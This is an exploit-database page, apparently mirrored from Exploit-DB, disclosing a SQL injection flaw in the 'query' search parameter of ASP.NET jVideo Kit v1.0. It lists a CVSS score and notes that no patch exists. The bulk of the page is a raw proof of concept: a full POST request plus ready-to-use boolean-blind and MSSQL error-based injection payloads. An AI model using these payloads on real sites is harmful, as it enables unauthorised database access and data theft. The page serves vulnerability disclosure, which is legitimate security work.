header-logo
Suggest Exploit
vendor:
ASP.NET jVideo Kit
by:
Özkan Mustafa Akkus (AkkuS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ASP.NET jVideo Kit
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mediasoftpro:asp.net_jvideo_kit
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

ASP.NET jVideo Kit – ‘query’ SQL Injection

The vulnerability allows an attacker to inject sql commands from the search section with 'query' parameter. You can use the GET or POST methods. The vulnerable payloads are AND boolean-based blind - WHERE or HAVING clause and Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN).

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaSoft Pro
# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/
# Version: v1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'query' parameter. You can use the GET or POST
methods.
====================================================

# PoC : SQLi :

# GET : http://test.com/search?query=[SQL]
# POST : http://test.com/search
POST /search HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.com/login
Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o;
__RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1

Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Query=test


# Vulnerable Payload :

Parameter: query (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: query=test%' AND 3923=3923 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause (IN)
    Payload: query=test%' AND 1603 IN (SELECT
(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN
(1603=1603) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='


====================================================

Navigation

Suggest Exploit

Services By CQR